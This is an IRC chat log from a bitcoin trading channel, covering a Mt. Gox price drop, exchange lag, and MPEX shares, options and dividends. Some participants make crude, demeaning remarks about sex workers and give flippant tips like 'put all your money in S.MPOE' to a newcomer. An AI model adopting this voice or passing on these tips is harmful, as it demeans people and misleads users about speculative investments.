low: 22.01000, 24 hour high: 26.30000, 24 hour vwap: 25.03072 Feb 14 02:41:57 ;;bc,convert eur Feb 14 02:41:58 1 BTC = 23.05000 U.S. dollars = 17.1082907 Euros Feb 14 02:42:32 last is 25 cents higher than best ask though Feb 14 02:43:07 ya no problem with that Feb 14 02:44:08 soh, will it break 20 Feb 14 02:44:13 ;;goxlag Feb 14 02:44:14 312.221853 seconds Feb 14 02:44:26 5 min lag...? Feb 14 02:44:39 they suck yea Feb 14 02:44:53 we might be at 50$ for all we know by now Feb 14 02:45:05 it could be in their interest for more lag though - more panic, more selling, more transaction fees, more profit.. Feb 14 02:45:27 i could be just php. Feb 14 02:45:30 :) Feb 14 02:47:24 We could be at 1 or at 50, yeah Feb 14 02:47:30 too much lag Feb 14 02:47:40 i hope its 1. Feb 14 02:49:22 ;;ticker Feb 14 02:49:22 BTCUSD ticker | Best bid: 22.52201, Best ask: 22.79700, Bid-ask spread: 0.27499, Last trade: 22.79700, 24 hour volume: 111499.86991286, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.97243 Feb 14 02:49:27 teh wow. Feb 14 02:49:49 so thisis the great unwind. Feb 14 02:53:15 ;;goxlag Feb 14 02:53:16 496.211258 seconds Feb 14 02:53:22 lol Feb 14 02:53:26 getting even wrose Feb 14 02:53:34 [MPEX] [O.BTCUSD.P230T] 265 @ 0.07546687 = 19.9987 BTC [+] Feb 14 02:53:43 i tell you Feb 14 02:53:51 their bad code is fuckin bitcoin stability Feb 14 02:54:23 [MPEX] [S.MPOE] 1224 @ 0.00063701 = 0.7797 BTC [-] Feb 14 02:54:25 [MPEX] [S.MPOE] 34276 @ 0.00063696 = 21.8324 BTC [-] Feb 14 02:55:22 ;;ticker Feb 14 02:55:23 BTCUSD ticker | Best bid: 22.50000, Best ask: 22.65000, Bid-ask spread: 0.15000, Last trade: 22.65000, 24 hour volume: 114786.56433186, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.89309 Feb 14 02:55:54 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.51921463 = 519.2146 BTC [+] Feb 14 02:56:12 [MPEX] [S.MPOE] 4321 @ 0.00064464 = 2.7855 BTC [+] Feb 14 02:56:14 [MPEX] [S.MPOE] 10829 @ 0.00064499 = 6.9846 BTC [+] Feb 14 02:57:14 [BTCTC] [S.MPOE-PT] 2594 @ 0.00067 = 1.738 BTC [-] Feb 14 03:01:31 ;;ticker Feb 14 03:01:31 BTCUSD ticker | Best bid: 22.78000, Best ask: 22.90000, Bid-ask spread: 0.12000, Last trade: 22.78000, 24 hour volume: 115402.35989204, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.87805 Feb 14 03:01:40 what is this dog? Feb 14 03:03:12 seems like it stopped falling Feb 14 03:03:27 or gox capped out Feb 14 03:03:30 we dont know really. Feb 14 03:03:32 :> Feb 14 03:03:37 the asks are soo thin.. Feb 14 03:03:50 yea Feb 14 03:06:55 ;;ticker Feb 14 03:06:56 BTCUSD ticker | Best bid: 23.04288, Best ask: 23.08065, Bid-ask spread: 0.03777, Last trade: 23.08065, 24 hour volume: 117425.35972100, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.84136 Feb 14 03:07:20 ;;goxlag Feb 14 03:07:21 45.297523 seconds Feb 14 03:07:41 seems like now might not be a bad time to buy Feb 14 03:08:37 ;;ticker Feb 14 03:08:38 BTCUSD ticker | Best bid: 23.33000, Best ask: 23.49800, Bid-ask spread: 0.16800, Last trade: 23.49800, 24 hour volume: 117968.26192446, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.83143 Feb 14 03:09:28 http://bitcoin.clarkmoody.com/ Feb 14 03:09:43 Some slight bounce going on. Feb 14 03:09:50 We reached like 21.7 Feb 14 03:11:19 crazy times Feb 14 03:11:55 i'm sorry, did someone just take a 35k dump? Feb 14 03:16:55 ;;ticker Feb 14 03:16:55 BTCUSD ticker | Best bid: 24.40000, Best ask: 24.74000, Bid-ask spread: 0.34000, Last trade: 24.40000, 24 hour volume: 121630.16790847, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.80265 Feb 14 03:17:00 well, that was fast Feb 14 03:17:14 impressive recovery Feb 14 03:19:28 dump&pump Feb 14 03:19:46 no kiddin Feb 14 03:20:00 that was what, 35k btc? Feb 14 03:20:22 Recovery? I call it a bounce Feb 14 03:20:28 no market depth Feb 14 03:20:29 whats the difference Feb 14 03:20:32 ;;ticker Feb 14 03:20:32 BTCUSD ticker | Best bid: 24.91954, Best ask: 24.94948, Bid-ask spread: 0.02994, Last trade: 24.91954, 24 hour volume: 122926.85310540, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.80555 Feb 14 03:20:56 jan 24th was different Feb 14 03:21:05 http://www.bitcoincharts.com/markets/mtgoxUSD.html Feb 14 03:21:12 There's a LOT of asks now Feb 14 03:21:19 [MPEX] [S.MPOE] 4321 @ 0.00063706 = 2.7527 BTC [-] Feb 14 03:21:21 [MPEX] [S.MPOE] 5179 @ 0.00063696 = 3.2988 BTC [-] Feb 14 03:21:43 and no market depth. Will crash right back. Price is unstable and should now correct, hopefully. Feb 14 03:21:57 I'd prefer stable BTC prices Feb 14 03:23:04 pretty sure the liquidity will prevent that Feb 14 03:26:46 ;;ticker Feb 14 03:26:47 BTCUSD ticker | Best bid: 24.40000, Best ask: 24.90000, Bid-ask spread: 0.50000, Last trade: 24.40000, 24 hour volume: 123213.42485046, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.80525 Feb 14 03:27:10 no actually, this is it. Feb 14 03:27:18 price is now 24.5ish. the end. Feb 14 03:28:16 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.53072917 = 530.7292 BTC [+] Feb 14 03:28:36 wtf, coinbase lowered their sell limit from 1K to 300 Feb 14 03:28:42 w/out a notification. Feb 14 03:29:50 [MPEX] [S.DICE] 70 @ 0.00609588 = 0.4267 BTC [+] Feb 14 03:29:59 Price went to 25.5 like 10 minutes ago and now back down Feb 14 03:30:15 It ain't down yet Feb 14 03:30:16 http://www.bitcoincharts.com/markets/mtgoxUSD.html Feb 14 03:30:26 Not until that huge gap disappear ^ Feb 14 03:31:35 ;;tslb Feb 14 03:31:37 looks like we can hit 21 dollars any minute Feb 14 03:31:38 Time since last block: 18 minutes and 13 seconds Feb 14 03:31:45 ;;bc,stats Feb 14 03:31:48 Current Blocks: 221055 | Current Difficulty: 3275464.586565617 | Next Difficulty At Block: 221759 | Next Difficulty In: 704 blocks | Next Difficulty In About: 4 days, 1 hour, 39 minutes, and 53 seconds | Next Difficulty Estimate: 3478478.41739 | Estimated Percent Change: 6.19802 Feb 14 03:32:01 Now prices are unstable and all it would take is some larger holding seeing this, panicking and selling 20k at market price to send it all crashing for good. Feb 14 03:32:14 2 dollar coins please Feb 14 03:32:20 [MPEX] [S.MPOE] 4321 @ 0.00064238 = 2.7757 BTC [+] Feb 14 03:32:22 [MPEX] [S.MPOE] 10745 @ 0.00064256 = 6.9043 BTC [+] Feb 14 03:32:24 [MPEX] [S.MPOE] 1821 @ 0.00064499 = 1.1745 BTC [+] Feb 14 03:32:24 nah... that won't happen again... Feb 14 03:32:25 [MPEX] [S.MPOE] 2889 @ 0.00064701 = 1.8692 BTC [+] Feb 14 03:32:37 fine. 2.1 coins please Feb 14 03:32:39 But I value BTC maybe 16-18 USD right now. Feb 14 03:34:26 if we hit 2 dollars again im getting an mpex Feb 14 03:34:28 lol Feb 14 03:34:35 Namworld are you selling at $17? Feb 14 03:39:35 ;;ticker Feb 14 03:39:36 BTCUSD ticker | Best bid: 24.39917, Best ask: 24.40000, Bid-ask spread: 0.00083, Last trade: 24.40000, 24 hour volume: 126560.10139199, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.80221 Feb 14 03:39:53 Namworld nah. it's done. Feb 14 03:40:08 lol Bowjob Feb 14 03:40:33 i sold at 25 bought back at 24 sold back some at 25 Feb 14 03:40:40 youll be rich Feb 14 03:40:44 ;;bc,convert eur Feb 14 03:40:45 good game but not worth it Feb 14 03:40:46 1 BTC = 24.30001 U.S. dollars = 18.0360796 Euros Feb 14 03:40:58 hey, if it drops another euro i can buy my 200 back Feb 14 03:41:05 better to not look at btc value and just make new coins on fx Feb 14 03:42:02 No, unless it drops under 17 USD/BTC Feb 14 03:42:31 We're headed back downward Feb 14 03:42:35 ;;ticker Feb 14 03:42:35 BTCUSD ticker | Best bid: 24.04750, Best ask: 24.40102, Bid-ask spread: 0.35352, Last trade: 24.04750, 24 hour volume: 126934.28273813, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.80032 Feb 14 03:46:43 is this all about asics coming online today? Feb 14 03:46:46 probably Feb 14 03:47:17 They're coming only today? Who's? Feb 14 03:47:30 pirates. Feb 14 03:47:57 so we've got the good old days until at least the next difficulty reset. Feb 14 03:48:19 Namworld: er, asicminer most likely has almost all of theirs online Feb 14 03:48:34 no one can get ahold of friedcat, which is evidence in of itself that hes very busy plugging shit in Feb 14 03:49:07 :) Feb 14 03:49:11 +1 asicminer Feb 14 03:49:14 and selling his new btcs Feb 14 03:49:14 http://www.stripperweb.com/forum/showthread.php?181800-Bitcoin-Giveaway&p=2454907#post2454907 Feb 14 03:49:22 meanwhile the girl is totally rocking the stripper thread Feb 14 03:49:27 ;;tslb Feb 14 03:49:31 Time since last block: 36 minutes and 6 seconds Feb 14 03:49:39 so much for asic. Feb 14 03:49:41 ya totally asics Feb 14 03:49:41 lol Feb 14 03:50:27 MP are you being sarcastic? I don't know enough to be able to tell... Feb 14 03:50:51 sorry,, Mr. P Feb 14 03:51:13 not rly Feb 14 03:51:18 she's really rocking it. Feb 14 03:52:38 lol at that thread Feb 14 03:53:01 totally. Feb 14 03:54:56 ;;ticker Feb 14 03:54:56 BTCUSD ticker | Best bid: 24.30000, Best ask: 24.35001, Bid-ask spread: 0.05001, Last trade: 24.30000, 24 hour volume: 126809.53474656, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.79075 Feb 14 03:55:04 i've learned to look at ticker when Bugpowder logs in Feb 14 03:55:17 Heh Feb 14 03:55:20 Not bad Feb 14 03:55:32 Time will tell though Feb 14 03:55:56 I'm the fucker who got the P230T bugpowder =/ Feb 14 03:56:12 How many? Feb 14 03:56:18 4000 Feb 14 03:56:19 5k? Feb 14 03:56:19 3k? Feb 14 03:56:22 eh. Feb 14 03:56:23 Notice Feb 14 03:56:24 in between Feb 14 03:56:27 Noice Feb 14 03:56:34 that may not actually come in the money. Feb 14 03:56:40 Yah I am locked and loaded Feb 14 03:56:44 maybe not. Feb 14 03:56:54 But I think the recent growth was too much too fast Feb 14 03:57:03 Bugpowder which direction ? short btc ? Feb 14 03:57:08 Namworld for sure. Feb 14 03:57:13 10k puts Feb 14 03:57:17 As I said, I have a 16-18 USD/BTC valuation. Feb 14 03:57:18 i think tho we will see 24-25 for the rest of the month. Feb 14 03:57:30 Possible. Feb 14 03:57:30 true, no 30? Feb 14 03:57:31 I have no idea Feb 14 03:57:44 i doubt it. Feb 14 03:57:48 I just am swinging for the fences Feb 14 03:57:49 maybe a lil sniff of 30 Feb 14 03:57:55 the way i've seen this to work is when high volume breaks, the price gets set Feb 14 03:58:10 and high volume just broke Feb 14 03:58:11 25 would be nice for a while tho Feb 14 03:58:16 yup Feb 14 03:58:21 pretty perfect. Feb 14 03:58:28 There is a LOT of overhead pressure Feb 14 03:58:39 25 for a while would be great for smoke Feb 14 03:58:45 Bugpowder there was a lot of under pressure for a while. Feb 14 03:58:48 S.mpoe Feb 14 03:59:04 well that forum proves it Feb 14 03:59:05 Yeah and it it fcking annihilated while I had dinner Feb 14 03:59:09 that overhead has released a bit too. Feb 14 03:59:12 whore are retarded in reality as well. Feb 14 03:59:15 whores* Feb 14 03:59:21 kakobrekla lol Feb 14 03:59:35 srsly, don't knock whores, some of my best friends were hos. Feb 14 04:00:00 well deze bitched be dumb. Feb 14 04:00:02 when you have all your funds tied up in bitcoin its days like this you wish your local vedor took bitcoin for a pack of smokes or something Feb 14 04:00:09 bitches Feb 14 04:00:12 meh cant type. Feb 14 04:00:30 BitHub having all your funds tied in bitcoin is unsanitary. Feb 14 04:00:37 There is a good chance of another leg down. Feb 14 04:00:37 kakobrekla tru dat. Feb 14 04:00:47 Bugpowder also tru dat. Feb 14 04:00:54 well i mean not all my funds but all the fiat i put aside just for bitcoin Feb 14 04:00:59 Usually these moves are damped oscillations Feb 14 04:01:13 23.5 looks like a settle Feb 14 04:01:17 But... Feb 14 04:01:21 Well if bugpowder thinks like me, I'm satisfied. Feb 14 04:01:31 Anything is possible, cause bitcoin. Feb 14 04:01:36 yeah Feb 14 04:02:12 [MPEX] [S.DICE] 1530 @ 0.00609588 = 9.3267 BTC [+] Feb 14 04:02:36 i think i should try other stock exchanges and stuff Feb 14 04:02:53 having it all tied up into one site, real bad idea Feb 14 04:04:03 trying btcjam.com - i'll give you guys a review in a week. Let you know if its any good or a waste of time. Feb 14 04:04:27 hi, you must be new. Feb 14 04:05:24 lol Feb 14 04:06:03 lol totally. Feb 14 04:06:15 anyone have opinions on coinbr vs havelock? Feb 14 04:06:16 BitHub look up the girl's suspected scam thread in btctalk Feb 14 04:06:27 swhitt yes. jurov likes coinbr and topace isn't here. Feb 14 04:06:34 looking for a 2nd trading platform in addition to mpex Feb 14 04:06:37 [MPEX] [S.MPOE] 4321 @ 0.0006386 = 2.7594 BTC [-] Feb 14 04:06:39 [MPEX] [S.MPOE] 12479 @ 0.0006384 = 7.9666 BTC [-] Feb 14 04:06:43 mircea_popescu: _they_ should eh? Feb 14 04:08:03 i guess so hehe Feb 14 04:08:11 Btcjam? Lol Feb 14 04:08:24 you can buy everything on coinbr, only s.dice passthrough on havelock and 2 "mining bonds" Feb 14 04:08:30 ? Feb 14 04:08:43 its only 100btc Feb 14 04:08:50 i think i'll get most of it back Feb 14 04:08:52 s.dice on coinbr pays 100% - account management fee, on havelock it only pays 95% Feb 14 04:08:53 Coinbr is all you need if you have under 300btc Feb 14 04:09:12 Mpex is all u need if you have more Feb 14 04:09:16 there are many better places to put 100 btc Feb 14 04:09:22 where? Feb 14 04:09:27 like? Feb 14 04:09:32 a hookers twat? Feb 14 04:09:35 a cold wallet? Feb 14 04:09:39 how many btc can I fit in there? Feb 14 04:09:41 well it is valentines day Feb 14 04:09:53 a cold wallet? Feb 14 04:09:55 maybe if I used a thumbdrive, i could keep it in her ass. Feb 14 04:09:55 ∞ in a cold wallet Feb 14 04:09:59 but i want to make a lil btc off it Feb 14 04:10:23 BitHub so buy mpoe bonds Feb 14 04:10:24 lol someone wanted me to buy bitcoins for them I get 10% commision Feb 14 04:10:30 at least if you lose your btc you know why. Feb 14 04:10:40 well, ∞ as ∞ -> 21,000,000 Feb 14 04:10:56 i don't even know what mpoe bonds means Feb 14 04:11:08 who was runningthe pt, Namworld ? Feb 14 04:11:09 i still got lots to learn before doing that Feb 14 04:11:15 coinbr Feb 14 04:11:28 DeadWeasel re thumbdrive : http://polimedia.us/dtng/c/src/136077828147.gif Feb 14 04:11:30 no need to rush into things Feb 14 04:11:36 learn about the market Feb 14 04:11:45 there are always new opportunities arising Feb 14 04:11:46 i'm only about 6months into it Feb 14 04:11:52 if he does things like dropping 100btc on btcjam he won't have much need to learn anything Feb 14 04:11:53 but learning heaps Feb 14 04:11:55 those aren't thumbs Feb 14 04:12:02 mircea_popescu: ^ Feb 14 04:12:05 DeadWeasel depends on your standards :D Feb 14 04:12:12 they look like thumbs to me. Feb 14 04:12:17 luzl mircea i was joking about that, i just dropped 5btc to try it out Feb 14 04:12:20 [MPEX] [S.MPOE] 3459 @ 0.0006384 = 2.2082 BTC [-] Feb 14 04:12:22 [MPEX] [S.MPOE] 10741 @ 0.00063696 = 6.8416 BTC [-] Feb 14 04:12:23 she sure seems to like it Feb 14 04:12:28 da2ce7 darkee DBordello DeadWeasel Diablo-D3 dub dust-otc Feb 14 04:12:32 DeadWeasel buttcoin! Feb 14 04:12:39 BitHub that may work. keep us appraised. Feb 14 04:12:42 is coin br a pass thru or is it a bot that directly trades at mpex? Feb 14 04:12:43 mircea_popescu: my btcs would not be safe in there. Feb 14 04:12:47 will do :) Feb 14 04:13:03 Bowjob it's a broker i thought ? Feb 14 04:13:20 so i cant sell directly on mpex thru coin.br then Feb 14 04:13:33 um Feb 14 04:13:38 think we'll settle here? 24.5? Feb 14 04:13:41 is mpex doing the most volume right now? Feb 14 04:13:49 DeadWeasel i was sayingso but these ppl disagreed with me Feb 14 04:13:49 for stocks Feb 14 04:13:57 BitHub for everything by very far. Feb 14 04:14:15 BitHub: MPEX is like the cartel. Feb 14 04:14:25 like a real drug cartel? Feb 14 04:14:32 BitHub: they sell the drugs to smaller syndicates, who then open 'exchanges' Feb 14 04:14:32 if frank sinatra were a website Feb 14 04:14:37 he'd be frank mpexatra. Feb 14 04:15:06 BitHub: which are poorly written and run websites they basically sell you what they bought from the 'Cartel' Feb 14 04:15:15 ahh ok Feb 14 04:15:18 or so they would have us believe. Feb 14 04:15:49 ;;tslb Feb 14 04:15:51 Time since last block: 5 minutes and 47 seconds Feb 14 04:15:54 hrm Feb 14 04:15:56 it's all completely improvable and insane, but if you're not a total twat you can make a couple BTC. Feb 14 04:16:12 which is fun, but effectively not worth your time if you have a real job. Feb 14 04:16:13 wait Feb 14 04:16:16 people who ARENT total twats? Feb 14 04:16:19 where? Feb 14 04:16:24 not in here. Feb 14 04:16:28 i'm a twat. Feb 14 04:16:31 your a twat. Feb 14 04:16:34 everywhere a twat twat Feb 14 04:16:47 *you're Feb 14 04:16:49 see I just proved it Feb 14 04:16:55 jurov's a twink Feb 14 04:16:58 ;;slap deadweasel Feb 14 04:17:01 *your Feb 14 04:17:03 damnit Feb 14 04:17:09 haha Feb 14 04:17:11 twat Feb 14 04:17:16 Let's settle at $20 Feb 14 04:17:20 seems reasonable Feb 14 04:17:20 lol Feb 14 04:17:27 ;;twat deadwat Feb 14 04:17:27 Error: "twat" is not a valid command. Feb 14 04:17:40 !twat gnat Feb 14 04:17:50 !twat MPOE Feb 14 04:17:56 nu-uh Feb 14 04:18:16 come on rebound! Feb 14 04:18:19 ;;ticker Feb 14 04:18:20 BTCUSD ticker | Best bid: 24.64900, Best ask: 24.72998, Bid-ask spread: 0.08098, Last trade: 24.64900, 24 hour volume: 126154.93631317, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.77711 Feb 14 04:18:27 mpex doesn't seem very serious tho Feb 14 04:18:28 ? Feb 14 04:18:30 lol it'd be so sad if it goes back to 30+ Feb 14 04:18:36 these guys with all the puts... Feb 14 04:18:40 why, how many you dump? Feb 14 04:18:41 seems like they could close down and take your coins any day now Feb 14 04:18:46 mpex is a fucking joke! Feb 14 04:18:49 BitHub are you being serious ? Feb 14 04:18:53 BitHub: EVERYONE could Feb 14 04:18:55 this is like trolling. Feb 14 04:18:59 only better. Feb 14 04:19:10 hold you BTCs in a cold wallet at home and don't look back. Feb 14 04:19:12 just hold Feb 14 04:19:13 BitHub they dont even have CSS Feb 14 04:19:21 trolling? No i'm being serious its just the impression i'm getting from first reading it Feb 14 04:19:22 !css kako Feb 14 04:19:23 maybe they have a troll MPEX contest over at SA Feb 14 04:19:26 [MPEX] [S.MPOE] 4321 @ 0.00064666 = 2.7942 BTC [+] Feb 14 04:19:27 mpex is for gypsy puppets! Feb 14 04:19:27 [MPEX] [S.MPOE] 10346 @ 0.00064701 = 6.694 BTC [+] Feb 14 04:19:30 Bowjob totally. Feb 14 04:19:36 Bowjob: that has to be it Feb 14 04:19:36 litecoin rulez Feb 14 04:19:39 this is where i pimp my new tagline Feb 14 04:19:47 pigeons: lol Feb 14 04:20:03 pigeons is so fringe. he's always like, doing something nobody heard of Feb 14 04:20:05 !twat alt coins Feb 14 04:20:05 lulz oh, this is your site mircea? Feb 14 04:20:13 hence the MP. Feb 14 04:20:13 lulz Feb 14 04:20:50 mircea_popescu: is a harsh mistress. Feb 14 04:20:52 also mpoe-pr is my pr chick. Feb 14 04:21:03 and this is my bitcoin. Feb 14 04:21:16 kako, i actually like the simplicity of the website, easy to understand Feb 14 04:21:21 and roger ver is my son. Feb 14 04:21:26 they call him bitcoin bejesus. Feb 14 04:21:38 i think it just gives off a first impression Feb 14 04:21:42 bad Feb 14 04:22:34 reddit sentiment remains high Feb 14 04:22:34 http://www.reddit.com/r/Bitcoin/comments/18haei/sell_sell_mayday_mayday/ Feb 14 04:22:36 i think its more catered to insiders of the community, rather than the mainstream people Feb 14 04:22:42 not sure if this is a counter indicator or not Feb 14 04:22:45 30day volume is nearly 2 million BTC Feb 14 04:22:48 on gox Feb 14 04:22:52 Bugpowder_ that should be a meme. Feb 14 04:23:06 DeadWeasel ya was a heavy day today Feb 14 04:23:23 any discount on the 30btc fee for mpex mircea :P Feb 14 04:23:26 30K this morning, 140K tonight. crazy Feb 14 04:23:27 yes Feb 14 04:23:31 use my referral code Feb 14 04:23:38 oh? Feb 14 04:23:47 BitHub if you use someone's fingerprint you each get 5 btc Feb 14 04:23:51 1578A821 Feb 14 04:23:54 its in the faq Feb 14 04:23:57 neat Feb 14 04:24:04 he needs the whole keyid tho Feb 14 04:24:09 not just the tail Feb 14 04:24:19 AA14 8EAF 40BE 9C02 F091 F382 F157 3A6B 1578 A821 Feb 14 04:24:27 SAVE 5BTC Feb 14 04:24:29 thats too much. Feb 14 04:24:32 so use that whole thing? Feb 14 04:24:52 neither of those is key id Feb 14 04:24:53 I dunno Feb 14 04:24:55 fuck Feb 14 04:25:09 ;;getrating bugpowder Feb 14 04:25:10 WARNING: Currently not authenticated. User Bugpowder, rated since Tue Sep 11 08:01:46 2012. Cumulative rating 7, from 5 total ratings. Received ratings: 5 positive, 0 negative. Sent ratings: 3 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Bugpowder Feb 14 04:25:16 does mpex have a failsafe proof backup plan if a GLBSE happens? Feb 14 04:25:19 1573a6b1578a821 Feb 14 04:25:20 http://bitcoin-otc.com/viewgpg.php?nick=Bugpowder Feb 14 04:25:25 use that one Feb 14 04:25:26 F15 Feb 14 04:25:31 that is what you need Feb 14 04:25:34 Bugpowder_ he's trolling you. Feb 14 04:25:34 Bugpowder_^^ Feb 14 04:25:53 AA148EAF40BE9C02F091F382F1573A6B1578A821 is teh right thing Feb 14 04:26:02 ahh okey, thanks Feb 14 04:26:05 afaik F1573A6B1578A821 is the right thing Feb 14 04:26:08 faq says key id Feb 14 04:26:08 F1573A6B1578A821 Feb 14 04:26:12 i'll go with mircea Feb 14 04:26:13 its tru Feb 14 04:26:25 the longer the better. Feb 14 04:26:27 can we get a ROTA ruling Feb 14 04:26:29 you are all fucked Feb 14 04:26:29 ?? Feb 14 04:26:33 anyway, re failsafe : see the faq! Feb 14 04:26:40 there's a dump and all sorts of discussions Feb 14 04:26:42 ahh check Feb 14 04:26:46 will do Feb 14 04:26:58 rota rules you must all buy me a shrubbery. Feb 14 04:27:02 BitHub: just remember to breathe. Feb 14 04:27:32 i only half know what i'm doing Feb 14 04:27:50 but you gotta burn some btc to learn Feb 14 04:27:54 so relax, take it easy Feb 14 04:27:55 BitHub put all your money in S.MPOE Feb 14 04:27:56 what's the hurry. Feb 14 04:28:06 bithub, put all your money in dmc 2.0 Feb 14 04:28:18 put all your money in ART Feb 14 04:28:29 or real estate. Feb 14 04:28:32 put all your money in pirate. Feb 14 04:28:32 da fuck is art ? Feb 14 04:28:34 that has art on it. Feb 14 04:28:43 i just want to start earning 1btc a day Feb 14 04:28:47 as quickly as possible Feb 14 04:28:50 off divs or whatever Feb 14 04:28:52 sell your ass Feb 14 04:28:55 or that Feb 14 04:29:03 BitHub divs are not where its at Feb 14 04:29:15 capital appreciation outweighs it Feb 14 04:29:25 he has a point. Feb 14 04:29:29 So much capital flow into MPEX must go somewhere Feb 14 04:29:30 have no idea what that means Feb 14 04:29:43 stock price rises have crushed the dividends Feb 14 04:29:51 oh Feb 14 04:30:16 actually i don't even have that much capital Feb 14 04:30:18 Like S.DICE has paid out around what, .01? Feb 14 04:30:23 there's totally 5-6 mn still waiting for a home out there Feb 14 04:30:42 err Feb 14 04:30:45 .001 Feb 14 04:30:53 i think a year from now i'll be doing alot better Feb 14 04:30:55 but price has risen .0035 Feb 14 04:31:02 !ticker m s.dice Feb 14 04:31:03 just need to get that first n00b year out of the way Feb 14 04:31:03 sounds about right Feb 14 04:31:04 [MPEX:S.DICE] 1D: 0.00598092 / 0.00617859 / 0.00625 (29517 shares, 182.37 BTC), 7D: 0.004321 / 0.00619263 / 0.0064 (1926831 shares, 11,932.15 BTC), 30D: 0.00085848 / 0.0056144 / 0.0075 (8131062 shares, 45,651.11 BTC) Feb 14 04:31:16 good, keep that positive attitude and you'll go far son. Feb 14 04:31:26 :) Feb 14 04:31:33 you know what i just realised ? Feb 14 04:31:40 you're right mircea no rush Feb 14 04:32:05 there's actually perversely more room for stock appreciation than for dividends Feb 14 04:32:23 because the listed busiensses are MUCH better at their business than avg btc person at allocating capital Feb 14 04:33:09 As risk perception of bitcoin goes down, stock price should approach a point where dividends are paying 5% of price a year Feb 14 04:33:16 so buying and selling shares is much better than just waiting on divs? Feb 14 04:33:25 buying mostly Feb 14 04:33:32 but divs are nice too Feb 14 04:33:50 every share i have pays a div, which is nice, long term play Feb 14 04:33:54 S.MPOE is like the daytrading stock Feb 14 04:33:55 ;;calc 20*12*20 / 10000 Feb 14 04:33:55 0.48 Feb 14 04:33:59 bots are on it all the time Feb 14 04:34:04 so that'd be a half bitcoin s.dice Feb 14 04:34:07 S.DICE is the heavy divvy stock Feb 14 04:34:27 but I have concerns about their revenue staying up Feb 14 04:34:33 yeah me too Feb 14 04:34:35 mo money mo problems Feb 14 04:34:40 i think it might be the myspace of the bitcoin world Feb 14 04:34:43 until I see more money flowing into the big betting accounts Feb 14 04:34:59 S.BBET has potential, but got bought really high in the IPO Feb 14 04:35:11 might be a passing fad? sdice Feb 14 04:35:12 so shares are very expensive relative to current div Feb 14 04:35:19 but most growth potential there Feb 14 04:35:20 i purchased alot of s.bbet on ipo Feb 14 04:35:27 long term play as well Feb 14 04:35:28 Oh? Feb 14 04:35:33 so you are not a n00b Feb 14 04:35:40 kind of Feb 14 04:35:42 well, bitbet made ~1400 worth of bets in jan. there's already like 1300+ and it's half february Feb 14 04:35:44 or not even Feb 14 04:35:57 and the div was calculated on ~400 btc that closed in january. Feb 14 04:36:04 so dividend payout is... Feb 14 04:36:12 prolly gonna increase Feb 14 04:36:15 i love divs hehe Feb 14 04:36:37 Then you have the futures Feb 14 04:36:44 but nobody will buy them Feb 14 04:36:47 for some reason Feb 14 04:37:00 i don't understand those enough Feb 14 04:37:01 despite the very resonable sale price on the current MAR futures Feb 14 04:37:05 and the options Feb 14 04:37:10 are where the real money is made Feb 14 04:37:12 and lost Feb 14 04:37:48 ya options can well wipe you, esp short Feb 14 04:39:02 do you think bbet would exchange some shares with me for some domains? Feb 14 04:40:21 o fuk Feb 14 04:40:26 2200 bid at 24.5 Feb 14 04:41:47 so much for cheap weekend coins Feb 14 04:41:55 heh Feb 14 04:41:58 we will see Feb 14 04:42:04 I'm not giving up yet Feb 14 04:42:29 i have more euros comming in dunno it just doesnt stop Feb 14 04:48:22 ;;ticker Feb 14 04:48:23 BTCUSD ticker | Best bid: 25.20100, Best ask: 25.25167, Bid-ask spread: 0.05067, Last trade: 25.43850, 24 hour volume: 125018.23437143, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.77011 Feb 14 04:48:34 rollercoaster of fun. Feb 14 04:48:46 BitHub you mean, they give shares for your domains ? Feb 14 04:49:35 unlikely Feb 14 04:49:46 fuuuuuk Feb 14 04:49:47 dis Feb 14 04:49:57 I should have checked the reddit sentiment index Feb 14 04:49:58 ;;ticker Feb 14 04:49:59 BTCUSD ticker | Best bid: 25.21105, Best ask: 25.29999, Bid-ask spread: 0.08894, Last trade: 25.21103, 24 hour volume: 125052.58662713, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.77029 Feb 14 04:50:01 lol Feb 14 04:50:11 Bugpowder_ what do you have now, calls ? puts ? Feb 14 04:50:12 this is milk. Feb 14 04:50:22 lots of puts Feb 14 04:50:25 o. Feb 14 04:50:30 no volume on this move Feb 14 04:50:32 that may not be the best thing. Feb 14 04:50:37 meh Feb 14 04:50:39 we will see Feb 14 04:51:44 Show me a 5k volume candleon the 15m and I'll believe it Feb 14 04:51:56 fawk Feb 14 04:52:09 but it looks less bad now Feb 14 04:52:24 very very hard to time that shit Feb 14 04:52:29 I got most at 14-16 Feb 14 04:52:49 shoulda waited for todays dump though, but bugpowder is right Feb 14 04:52:54 ain't no way to know Feb 14 04:53:00 so I Hooooooooolllldd Feb 14 04:53:05 ya, nobody;'s timing this crap. Feb 14 04:53:17 i love the speculation thread on bitcointalk Feb 14 04:53:17 i mean even if you do it, Feb 14 04:53:21 you prolly got lucky. Feb 14 04:53:21 i geta kick out of it Feb 14 04:53:44 I think we are gonna drop from here Feb 14 04:53:45 if you constantly watch the different charts, it's possible, but i work and eat and poop. Feb 14 04:55:07 ;;ticker Feb 14 04:55:07 BTCUSD ticker | Best bid: 25.21206, Best ask: 25.30000, Bid-ask spread: 0.08794, Last trade: 25.30000, 24 hour volume: 125063.37060347, 24 hour low: 21.72100, 24 hour high: 26.30000, 24 hour vwap: 24.77082 Feb 14 04:55:26 hey vwap actually moving up Feb 14 04:55:31 picking out apartments in santa monica Feb 14 05:00:02 [MPEX] [S.MPOE] 19317 @ 0.00063722 = 12.3092 BTC [-] Feb 14 